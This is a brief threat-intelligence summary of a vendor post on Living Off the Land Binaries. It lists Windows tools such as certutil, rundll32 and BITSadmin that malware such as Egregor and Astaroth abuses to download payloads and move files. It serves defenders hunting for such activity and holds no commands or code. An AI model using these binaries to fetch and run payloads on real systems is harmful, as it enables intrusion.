2022-03-15

Cybereason LOLBins & BITSadmin

Level: 
Tactical
  |  Source: 
Cybereason
Technology
Share:

Cybereason LOLBins & BITSadmin

Cybereason's threat hunting post dives into the usage of Living Off the Land Binaries (LOLBins) and deep dive with the tool BITSadmin. Many malware and ransomware variants abuse trust binaries for threat activities. Notable LOLBins utilized include msiexec, wscript, installutil, rundll32, regsvr32, wmic, certutil and bitsadmin. A variety of other applicable LOLBins exist that can be reviewed from the LOLbas project on Github, with many detections also available in the Anvilogic Armory. Analysis of BITSAdmin identified the tool has many applicable uses to "create, download, or upload jobs and monitor their progress" as detailed in Microsoft's documentation. Attackers have leveraged BITSadmin's capabilities to maliciously download payloads and/or to copy and move files. Various malware such as Astaroth malware, Egregor ransomware and ramnit trojan has utilized BITSadmin.

     

Get trending threats published weekly by the Anvilogic team.

Sign Up Now